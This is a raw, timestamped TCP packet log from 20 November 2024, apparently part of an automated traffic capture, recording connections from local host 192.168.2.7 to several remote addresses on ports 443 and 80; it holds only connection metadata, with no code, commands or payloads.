                                                                                                                                                                                                Nov 20, 2024 10:54:31.223884106 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.229393959 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.229669094 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.229716063 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.230010986 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.230019093 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.247658968 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.248116016 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.248123884 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.248563051 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.248567104 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.278774977 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.279293060 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.279346943 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.279800892 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.279808998 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.323095083 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.324961901 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.325030088 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.325089931 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.325098991 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.325109959 CET49791443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.325114965 CET4434979113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.327716112 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.327743053 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.327817917 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.327953100 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.327963114 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346456051 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346476078 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346554041 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346591949 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346791029 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346805096 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346816063 CET49792443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.346823931 CET4434979213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.349483967 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.349498987 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.349575043 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.349740028 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.349750042 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.363249063 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.364881992 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.364943027 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.364998102 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.365009069 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.365017891 CET49793443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.365022898 CET4434979313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.367355108 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.367383957 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.367456913 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.367582083 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.367593050 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384085894 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384309053 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384458065 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384505987 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384505987 CET49794443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384531975 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.384546041 CET4434979413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.387444973 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.387459040 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.387562990 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.387729883 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.387739897 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.406306982 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.407048941 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.407056093 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.407509089 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.407512903 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.506675005 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.506767988 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.506843090 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.507030010 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.507034063 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.507055044 CET49795443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.507060051 CET4434979513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.509865999 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.509912014 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.510030985 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.510237932 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.510253906 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.984308958 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.984844923 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.984858990 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:31.985284090 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:31.985289097 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.017853975 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.018834114 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.018845081 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.019263983 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.019268990 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.032550097 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.033014059 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.033020020 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.033474922 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.033478975 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.047817945 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.048177958 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.048191071 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.048576117 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.048580885 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091377974 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091486931 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091538906 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091635942 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091650963 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091669083 CET49796443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.091674089 CET4434979613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.094438076 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.094472885 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.094593048 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.094723940 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.094737053 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.126434088 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.126924038 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.126988888 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.127034903 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.127049923 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.127059937 CET49797443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.127063990 CET4434979713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.130412102 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.130451918 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.130522966 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.130779028 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.130791903 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.141556025 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143573999 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143640995 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143703938 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143708944 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143721104 CET49799443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.143723965 CET4434979913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.146399975 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.146424055 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.146498919 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.146691084 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.146703005 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.157979012 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158361912 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158420086 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158461094 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158468008 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158483982 CET49798443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.158488035 CET4434979813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.161731005 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.161772966 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.162019968 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.162019968 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.162055016 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.207709074 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.208328962 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.208368063 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.208811045 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.208817005 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313330889 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313786030 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313919067 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313955069 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313977003 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.313997984 CET49800443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.314004898 CET4434980013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.316559076 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.316576958 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.316653967 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.316792965 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.316802025 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.397051096 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.397130013 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.397310019 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.397577047 CET49780443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.397584915 CET44349780188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.407094955 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.407114983 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.407193899 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.407530069 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.407540083 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.746608019 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.747060061 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.747078896 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.747499943 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.747503996 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.773933887 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.774599075 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.774610043 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.775041103 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.775048018 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.788444996 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.789148092 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.789161921 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.789617062 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.789621115 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.808178902 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.808723927 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.808748007 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.809159994 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.809168100 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.865854979 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866373062 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866473913 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866493940 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866503000 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866513014 CET49801443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.866518021 CET4434980113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.869261026 CET49807443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.869283915 CET4434980713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.869352102 CET49807443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.869498014 CET49807443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.869513035 CET4434980713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.877603054 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.877687931 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.878886938 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.878909111 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.879240990 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.880530119 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.880568981 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:32.880618095 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.886730909 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887403965 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887465954 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887496948 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887501955 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887514114 CET49803443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.887516975 CET4434980313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.890153885 CET49808443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.890165091 CET4434980813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.890235901 CET49808443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.890368938 CET49808443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.890374899 CET4434980813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.915853024 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.915982008 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916079044 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916101933 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916147947 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916331053 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916332006 CET49804443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916351080 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.916363001 CET4434980413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917301893 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917313099 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917376995 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917404890 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917488098 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917649031 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917649031 CET49802443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917665005 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.917673111 CET4434980213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919256926 CET49809443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919281006 CET4434980913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919388056 CET49809443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919533014 CET49809443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919547081 CET4434980913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919631004 CET49810443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919645071 CET4434981013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919699907 CET49810443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919866085 CET49810443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.919876099 CET4434981013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.951306105 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.951915026 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.951931953 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:32.952477932 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:32.952485085 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059356928 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059783936 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059847116 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059895992 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059905052 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059919119 CET49805443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.059932947 CET4434980513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.064960003 CET49811443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.064994097 CET4434981113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.065172911 CET49811443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.065402031 CET49811443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.065418959 CET4434981113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150087118 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150203943 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150274038 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150417089 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150463104 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150490999 CET49806443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:33.150509119 CET44349806188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.152369976 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:33.157366991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.157443047 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:33.157574892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:33.162861109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.534156084 CET4434980813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.534744024 CET49808443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:33.534755945 CET4434980813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:33.535198927 CET49808443192.168.2.713.107.246.45
